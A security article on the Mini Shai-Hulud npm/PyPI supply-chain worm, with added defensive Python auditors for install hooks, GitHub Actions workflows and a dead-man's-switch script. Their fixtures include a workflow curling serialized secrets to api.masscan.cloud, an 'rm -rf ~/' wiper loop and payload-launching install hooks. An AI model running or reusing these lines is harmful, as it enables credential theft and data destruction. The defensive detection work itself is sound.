Mini Shai-Hulud Worm
The threat actor known as TeamPCP has been connected to a sophisticated supply chain attack campaign targeting widely used npm and PyPI packages associated with TanStack, UiPath, Mistral AI, OpenSearch, Guardrails AI, and several other ecosystems. The operation, tied to the evolving Mini Shai-Hulud malware campaign, demonstrates a significant escalation in software supply chain abuse and identity-driven compromise techniques.
Researchers identified that malicious npm packages were modified to include an obfuscated JavaScript component named router_init.js. This payload profiles infected environments and deploys an advanced credential stealer targeting cloud providers, cryptocurrency wallets, AI development tools, messaging platforms, CI/CD systems, and GitHub Actions environments. Exfiltrated data is primarily transmitted to the filev2.getsession.org domain.
The use of Session Protocol infrastructure highlights a deliberate attempt to evade enterprise security controls. Because the domain belongs to a decentralized privacy-focused messaging platform, it is less likely to be blocked by traditional network defenses. As a secondary exfiltration method, encrypted data is committed to attacker-controlled repositories through the GitHub GraphQL API using stolen GitHub authentication tokens under the author identity claude@users.noreply.github.com.
Persistence Mechanisms and Credential Theft Expansion
The malware introduces several persistence and surveillance capabilities designed to maintain long-term access to compromised development environments. Persistence hooks are established inside Claude Code and Microsoft Visual Studio Code, allowing the malware to survive system reboots and automatically relaunch whenever the IDEs are opened.
In addition, a gh-token-monitor service is deployed to continuously monitor and re-exfiltrate GitHub tokens. Two malicious GitHub Actions workflows are also injected into compromised repositories. These workflows serialize repository secrets into JSON format and upload the data to the external endpoint api.masscan.cloud.
The latest TanStack compromise differs significantly from earlier supply chain incidents. Rather than relying on a preinstall hook, attackers embedded a malicious JavaScript file directly into package tarballs and introduced an optional dependency pointing at a GitHub-hosted package. That dependency carries a prepare lifecycle hook that executes the payload through the Bun runtime. Because npm runs prepare when it installs a dependency from a git source, the hook fires during an ordinary install even though the top-level package declares no install script of its own.
The trojanized Mistral AI packages adopted an older infection strategy by modifying the package.json file with a preinstall hook that invokes node setup.mjs. This process downloads Bun and executes the same credential-stealing malware.
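The following is an added example, not code from the campaign or from any of the affected projects: a small Python audit that flags the two install-time vectors just described in a package.json or a packed tarball, namely lifecycle hooks (preinstall, install, postinstall, prepare) that launch a runtime or downloader, and dependencies whose spec resolves to a git host instead of the registry. The package names, the helper dependency and the hook commands in the samples are constructed; the article names setup.mjs and router_init.js but not the exact commands that invoke them.

```python
"""Audit an npm manifest or packed tarball for the two install-time vectors
described above: a lifecycle hook that launches a runtime or downloader,
and a dependency that resolves to a git host rather than the registry.
Added example; the manifests below are constructed stand-ins, not the
trojanized TanStack, Mistral AI or helper packages."""
import io
import json
import re
import tarfile

# Scripts npm runs on its own during install (prepare also runs when npm
# installs a dependency from git and has to build it).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# A hook that starts a runtime or fetches something is the pattern to flag.
LAUNCHER = re.compile(r"\b(node|bun|bunx|npx|curl|wget|sh|bash|python3?)\b")
# Dependency specs that point at a git host or URL instead of a version range.
GIT_SPEC = re.compile(r"^(github:|gitlab:|bitbucket:|git\+|git://|https?://|[\w.-]+/[\w.-]+(#.*)?$)")


def audit_manifest(manifest: dict) -> list[str]:
    """Return finding codes for one package.json document."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(f"hook:{hook}")
        if LAUNCHER.search(cmd):
            findings.append(f"hook-launcher:{hook}")
    for field in ("dependencies", "optionalDependencies", "devDependencies"):
        for name, spec in (manifest.get(field) or {}).items():
            if GIT_SPEC.match(spec):
                findings.append(f"git-dep:{field}:{name}")
    return findings


def build_tarball(files: dict[str, bytes]) -> bytes:
    """Constructed stand-in for `npm pack` output (entries live under package/)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo("package/" + path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def audit_tarball(data: bytes) -> list[str]:
    """Audit the manifest inside a tarball and note hook scripts it ships."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        names = {m.name.removeprefix("package/") for m in tar.getmembers() if m.isfile()}
        manifest = json.load(tar.extractfile("package/package.json"))
    findings = audit_manifest(manifest)
    for hook in INSTALL_HOOKS:
        for token in ((manifest.get("scripts") or {}).get(hook) or "").split():
            if token.lstrip("./") in names:  # the hook runs a file shipped in the tarball
                findings.append(f"hook-file:{hook}:{token.lstrip('./')}")
    return findings


# Constructed manifests modelled on the two vectors in the text (names hypothetical).
PREINSTALL_STYLE = {"name": "example-sdk", "version": "0.0.1",
                    "scripts": {"preinstall": "node setup.mjs", "test": "vitest"}}
OPTIONAL_DEP_STYLE = {"name": "@example/router-core", "version": "0.0.1",
                      "scripts": {"build": "tsc"},
                      "optionalDependencies": {"example-helper": "github:example-org/example-helper"}}
HELPER_DEP = {"name": "example-helper", "version": "0.0.1",
              "scripts": {"prepare": "bun ./router_init.js"}}  # exact command not given in the text
CLEAN = {"name": "clean-lib", "version": "1.0.0",
         "scripts": {"build": "tsc", "test": "vitest"}, "dependencies": {"lodash": "^4.17.21"}}


def run_samples() -> dict[str, list[str]]:
    tarball = build_tarball({"package.json": json.dumps(PREINSTALL_STYLE).encode(),
                             "setup.mjs": b"// constructed stand-in for the dropper"})
    return {"preinstall": audit_manifest(PREINSTALL_STYLE),
            "optional-dep": audit_manifest(OPTIONAL_DEP_STYLE),
            "helper": audit_manifest(HELPER_DEP),
            "clean": audit_manifest(CLEAN),
            "tarball": audit_tarball(tarball)}


if __name__ == "__main__":
    for label, result in run_samples().items():
        print(label, result)
```

Against a real package, feed `audit_tarball` the output of `npm pack`, and remember that the git-hosted dependency's own manifest is where the prepare hook lives, so audit it too. Setting `ignore-scripts=true` in .npmrc (or passing `--ignore-scripts`) stops npm from running any of these hooks, including prepare on git dependencies, at the cost of breaking packages that legitimately need them.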
CVE-2026-45321 and the Abuse of Trusted Publishing
The TanStack compromise has been officially tracked as CVE-2026-45321 and assigned a critical CVSS score of 9.6. Investigators confirmed that 42 packages and 84 versions within the TanStack ecosystem were affected.
Analysis revealed that the compromise originated from a chained GitHub Actions attack exploiting the pull_request_target trigger, GitHub Actions cache poisoning, and runtime extraction of OIDC tokens from GitHub Actions runners. Attackers reportedly staged malicious payloads through orphaned commits in GitHub forks before injecting them into npm package tarballs. The attackers then hijacked legitimate TanStack/router workflows to publish compromised packages with valid SLSA provenance attestations.
This marks a significant escalation in software supply chain attacks. The malicious packages carried valid SLSA Build Level 3 provenance, making this the first documented npm worm to distribute malicious packages with authentic build attestations. The caveat for consumers is that provenance attests only that a package was built by the named workflow from the named source commit; when the workflow itself has been hijacked, the attestation is genuine and the package is still malicious. The campaign subsequently expanded beyond TanStack into ecosystems maintained by UiPath, DraftLab, and other developers.
The operation heavily abuses trusted publishing workflows. Instead of stealing npm credentials directly, attacker-controlled code running inside trusted CI/CD pipelines leveraged OIDC permissions to mint short-lived publishing tokens during the build process. This allowed malicious packages to be published through legitimate release pipelines while bypassing conventional authentication safeguards.
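As an added example, not the researchers' tooling, the Python below triages GitHub Actions workflow files for both the injected secret-dumping workflows described in the persistence section and the pull_request_target chain described here. It works on the YAML text with regular expressions rather than parsing it, so hits are leads to inspect, not proof. The three workflows are constructed: the weak one reproduces the shape of the chain (pull_request_target, checkout of the PR head, id-token: write, install with lifecycle scripts on), the injected one the shape of the secret-serializing workflows (the endpoint path is constructed; the host is the one named in the article), and the release workflow shows id-token: write on a trigger an outsider cannot fire.

```python
"""Text-level triage of GitHub Actions workflow files for the patterns the
article describes.  Added example, not the researchers' tooling: it greps
the YAML rather than parsing it, so treat hits as leads, not proof."""
import re
from urllib.parse import urlparse

# Hosts a normal build step is expected to reach; anything else is reported.
EXPECTED_HOSTS = {"github.com", "api.github.com", "registry.npmjs.org"}

# Constructed workflow modelled on the chain in the text: pull_request_target
# plus checkout of the PR head runs fork-controlled code with id-token: write.
WEAK_CI = """\
name: ci
on:
  pull_request_target:
permissions:
  contents: read
  id-token: write
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci
      - run: npm test
"""

# Constructed stand-in for the injected workflows: secrets serialized to JSON
# and posted to the host named in the article (the request path is constructed).
INJECTED_EXFIL = """\
name: sync
on: [push]
jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo '${{ toJSON(secrets) }}' > s.json
          curl -sS --data @s.json https://api.masscan.cloud/
"""

# Constructed release workflow using OIDC the intended way: a trigger outsiders
# cannot fire, no fork-controlled checkout, lifecycle scripts off during install.
HARDENED_RELEASE = """\
name: release
on:
  push:
    tags: ['v*']
permissions:
  contents: read
  id-token: write
jobs:
  publish:
    runs-on: ubuntu-latest
    environment: npm-publish
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts
      - run: npm publish --provenance --access public
"""


def audit_workflow(text: str) -> list[str]:
    """Return finding codes for one workflow file."""
    findings = []
    prt = re.search(r"\bpull_request_target\b", text) is not None
    if prt and re.search(r"github\.event\.pull_request\.head", text):
        findings.append("PRT_HEAD_CHECKOUT")      # fork code runs with repo secrets
    if prt and re.search(r"id-token\s*:\s*write", text):
        findings.append("PRT_ID_TOKEN_WRITE")     # fork code can mint an OIDC token
    if prt and re.search(r"\bnpm\s+(ci|install|i)\b(?![^\n]*--ignore-scripts)", text):
        findings.append("PRT_LIFECYCLE_SCRIPTS")  # hooks of fork-chosen deps run
    if re.search(r"toJSON\(\s*secrets\s*\)", text, re.I):
        findings.append("SECRETS_SERIALIZED")     # whole secret store in one expression
    for url in re.findall(r"https?://[^\s'\"]+", text):
        host = urlparse(url).hostname
        if host and host not in EXPECTED_HOSTS:
            findings.append(f"OUTBOUND:{host}")
    return findings


if __name__ == "__main__":
    for label, wf in (("weak-ci", WEAK_CI), ("injected", INJECTED_EXFIL), ("hardened", HARDENED_RELEASE)):
        print(label, audit_workflow(wf))
```

Point it at every file under .github/workflows in each repository you publish from, including branches other than the default one, since the injected workflows described above were committed, not merged through review. A hit on SECRETS_SERIALIZED alongside an OUTBOUND host you do not recognize is the combination to escalate first.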
Self-Propagating Worm Behavior Raises Alarm
One of the most dangerous aspects of the Mini Shai-Hulud campaign is its worm-like propagation model. The malware actively searches for publishable npm tokens configured with bypass_2fa=true, enumerates packages maintained by the compromised developer, and exchanges GitHub OIDC tokens for per-package publish tokens. This mechanism enables the malware to spread laterally across package ecosystems without relying on traditional credential theft techniques.
The attack also exploited repository-level trust configurations inside GitHub's OIDC trusted publisher model. Because trust was granted broadly at the repository level instead of being restricted to protected branches and specific workflow files, malicious workflow executions triggered by orphaned commits were able to request legitimate npm publish tokens.
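To make the trust-scope point concrete, here is an added example (not npm's or GitHub's implementation) of the decision a registry makes when a workflow presents an OIDC token: it compares the token's claims against the package's trusted-publisher policy. Claim names follow GitHub's OIDC token; the repository, workflow file, refs and environment name are hypothetical. A policy that pins only the repository accepts any workflow run in that repository, which is the gap described above; a policy that also pins the workflow file, the protected ref and an environment rejects runs from an injected workflow or an unprotected ref. Which claims a given registry lets you pin is registry-specific; npm's trusted-publisher entry names the repository and workflow filename, with an optional environment.

```python
"""Simplified model of the trust decision behind OIDC trusted publishing:
the registry compares claims in the CI-issued OIDC token against the
trusted-publisher policy for the package.  Added example; not npm's or
GitHub's implementation.  Claim names follow GitHub's OIDC token
(repository, job_workflow_ref, ref, environment)."""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Policy:
    repository: str                 # always pinned, e.g. "example-org/router"
    workflow: str | None = None     # ".github/workflows/release.yml"; None = any workflow
    ref: str | None = None          # "refs/heads/main"; None = any ref
    environment: str | None = None  # "npm-publish"; None = any environment


def publish_allowed(policy: Policy, claims: dict) -> tuple[bool, str]:
    """Decide whether a token carrying these claims may mint a publish token."""
    if claims.get("repository") != policy.repository:
        return False, "repository mismatch"
    # job_workflow_ref looks like "owner/repo/.github/workflows/x.yml@refs/heads/main"
    path_part, _, wf_ref = claims.get("job_workflow_ref", "").partition("@")
    wf_path = path_part.removeprefix(policy.repository + "/")
    if policy.workflow and wf_path != policy.workflow:
        return False, f"workflow {wf_path or '?'} is not the trusted workflow"
    if policy.ref and (claims.get("ref") != policy.ref or wf_ref != policy.ref):
        return False, f"ref {claims.get('ref')} is not the trusted ref"
    if policy.environment and claims.get("environment") != policy.environment:
        return False, "environment is not the trusted environment"
    return True, "ok"


REPO = "example-org/router"  # hypothetical repository
RELEASE_WF = ".github/workflows/release.yml"

# Repository-level trust, as the text describes, versus trust pinned to the
# release workflow on the protected branch through a named environment.
REPO_LEVEL = Policy(repository=REPO)
TIGHT = Policy(repository=REPO, workflow=RELEASE_WF, ref="refs/heads/main", environment="npm-publish")

# Constructed claim sets.
LEGIT = {"repository": REPO, "ref": "refs/heads/main", "environment": "npm-publish",
         "job_workflow_ref": f"{REPO}/{RELEASE_WF}@refs/heads/main"}
# An injected workflow committed to an unprotected ref of the same repository.
INJECTED_WF = {"repository": REPO, "ref": "refs/heads/staging",
               "job_workflow_ref": f"{REPO}/.github/workflows/sync.yml@refs/heads/staging"}
# The real release workflow file, but run from an unprotected ref without the environment.
UNPROTECTED_REF = {"repository": REPO, "ref": "refs/heads/staging",
                   "job_workflow_ref": f"{REPO}/{RELEASE_WF}@refs/heads/staging"}


if __name__ == "__main__":
    for label, claims in (("legit", LEGIT), ("injected", INJECTED_WF), ("unprotected", UNPROTECTED_REF)):
        print(label, "repo-level:", publish_allowed(REPO_LEVEL, claims),
              "tight:", publish_allowed(TIGHT, claims))
```

One caveat the model makes visible: a token minted inside a pull_request_target run carries the base branch's ref and the base branch's workflow file, because that is the context such runs execute in, so pinning ref and workflow does not by itself protect a job that checks out and runs fork-controlled code while holding id-token: write. Keep untrusted code out of those jobs and put publishing behind an environment with required reviewers.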
Another disturbing capability involves the deployment of a 'dead-man's switch.' The malware installs a shell script that repeatedly polls the api.github.com/user endpoint every 60 seconds to determine whether attacker-created npm tokens remain active. These tokens carry the threatening description IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner.
If defenders revoke the token through the npm dashboard, the malware launches a destructive routine executing rm -rf ~/, effectively transforming the infection into wiper malware. This aggressive behavior indicates a substantial evolution in TeamPCP's operational tactics and demonstrates increasing sophistication in coercive persistence methods. Security teams are therefore advised to isolate and image infected systems before revoking compromised npm credentials.
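Before revoking anything, a responder wants to know whether the switch is present. The Python below is an added example, not the researchers' tooling: the article gives the script's behaviour (a loop that polls api.github.com/user every 60 seconds and runs rm -rf ~/ on the revocation signal) but not its path or text, so the fixture is constructed and the search is a three-indicator heuristic over shell-like files. The fixture is data for the scanner and must never be executed; the directories listed for a real hunt are plausible locations given the IDE persistence described above, not paths the article confirms.

```python
"""Hunt for the dead-man's-switch script described above.  Added example;
the fixture is a constructed stand-in shaped like the described behaviour,
never run it, and the scan is a three-indicator heuristic over text files."""
import re
import tempfile
from pathlib import Path

POLLS_GITHUB_USER = re.compile(r"api\.github\.com/user\b")
LOOPS = re.compile(r"\bwhile\b|\bsleep\s+\d+\b")
# rm with a recursive flag whose target is the home directory itself,
# not a path beneath it (so a cache cleanup does not match).
WIPES_HOME = re.compile(r"\brm\s+-\w*r\w*\s+(?:~|\$HOME|\"\$HOME\")/?(?:\s|;|$)")


def classify(text: str) -> dict[str, bool]:
    return {"polls": bool(POLLS_GITHUB_USER.search(text)),
            "loops": bool(LOOPS.search(text)),
            "wipes_home": bool(WIPES_HOME.search(text))}


def is_dead_mans_switch(text: str) -> bool:
    c = classify(text)
    return c["polls"] and c["loops"] and c["wipes_home"]


def scan_tree(root: Path, max_bytes: int = 1 << 20) -> list[Path]:
    """Return files under root that carry all three indicators."""
    hits = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.stat().st_size > max_bytes:
            continue
        try:
            text = p.read_text(errors="ignore")
        except OSError:
            continue
        if is_dead_mans_switch(text):
            hits.append(p)
    return hits


# Constructed fixture shaped like the described behaviour; not the real script.
FIXTURE = """#!/bin/sh
while true; do
  curl -sf -H "Authorization: Bearer $TOKEN" https://api.github.com/user >/dev/null || rm -rf ~/
  sleep 60
done
"""
# Constructed benign script: same endpoint, recursive rm of a cache, no loop.
BENIGN = """#!/bin/sh
curl -sf https://api.github.com/user >/dev/null
rm -rf ~/.cache/example-tool
"""


def run_sample() -> list[str]:
    """Scan a throwaway tree holding both constructed scripts; return hit names."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / ".config" / "example").mkdir(parents=True)
        (root / ".config" / "example" / "monitor.sh").write_text(FIXTURE)
        (root / "cleanup.sh").write_text(BENIGN)
        return [p.name for p in scan_tree(root)]


if __name__ == "__main__":
    print(run_sample())
    # Real hunt: directories plausibly touched by the IDE persistence described.
    for d in ("~/.claude", "~/.vscode", "~/.config", "~/.local/bin"):
        p = Path(d).expanduser()
        if p.is_dir():
            print(d, scan_tree(p))
```

Run the hunt on a forensic image or a mounted copy rather than the live host where possible, and widen the candidate directories to wherever the IDE hooks on that machine actually live; a hit means the revocation order in the advice above applies and the host should be imaged and isolated first.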
Affected Packages and Expanding Ecosystem Impact
The campaign has impacted more than 170 packages across both npm and PyPI, collectively accounting for over 518 million downloads. Investigators also identified at least 400 repositories created using stolen credentials, all containing the phrase 'Shai-Hulud: Here We Go Again.'
Affected packages include:
guardrails-ai@0.10.1 (PyPI)
mistralai@2.4.6 (PyPI)
@opensearch-project/opensearch@3.5.3, 3.6.2, 3.7.0, 3.8.0
@squawk/mcp@0.9.5
@squawk/weather@0.5.10
@squawk/flightplan@0.5.6
@tallyui/connector-medusa@1.0.1, 1.0.2, 1.0.3
@tallyui/connector-vendure@1.0.1, 1.0.2, 1.0.3
The malware also employs multiple redundant exfiltration channels. In addition to Session Protocol infrastructure and GitHub dead drops, stolen credentials are transmitted through the typosquatted domain git-tanstack.com.
PyPI Malware Introduces Geofenced Destructive Logic
The Python-based malware variants associated with the malicious Mistral AI and Guardrails AI packages differ substantially from the JavaScript payloads distributed via npm. The compromised mistralai PyPI package downloads a credential stealer from the remote host 83.142.209.194.
Researchers discovered that the Python malware contains country-aware logic designed to avoid execution in Russian-language environments. It also includes a geofenced destructive mechanism that introduces a one-in-six probability of executing rm -rf / if the infected system appears to be located in Israel or Iran.
This behavior demonstrates a concerning evolution toward region-aware destructive payload deployment within open-source package ecosystems.
The Growing Threat of Identity-Driven Supply Chain Attacks
The Mini Shai-Hulud campaign reflects a broader transformation in modern supply chain attacks. Rather than focusing solely on package compromise, threat actors are increasingly targeting trusted CI/CD identities, publishing workflows, and cloud-based automation pipelines.
Once attackers gain access to software publishing infrastructure, the development pipeline itself becomes the malware distribution mechanism. Because many malicious actions occur through legitimate workflows, trusted attestations, and authentic release systems, traditional security controls may fail to identify malicious behavior.
Key characteristics defining this new generation of supply chain attacks include:
- Abuse of trusted publishing and OIDC token exchange mechanisms
- Propagation through legitimate CI/CD workflows and build systems
- Use of valid SLSA attestations to disguise malicious packages
- Multi-channel credential exfiltration and persistence operations
- Destructive retaliation mechanisms designed to intimidate defenders
The campaign's expansion across AI tooling, enterprise automation, search infrastructure, frontend development, aviation-related tooling, and CI/CD ecosystems demonstrates how deeply interconnected software supply chains have become. Behavioral monitoring during package installation and build execution is now increasingly critical for detecting threats that appear legitimate at first glance.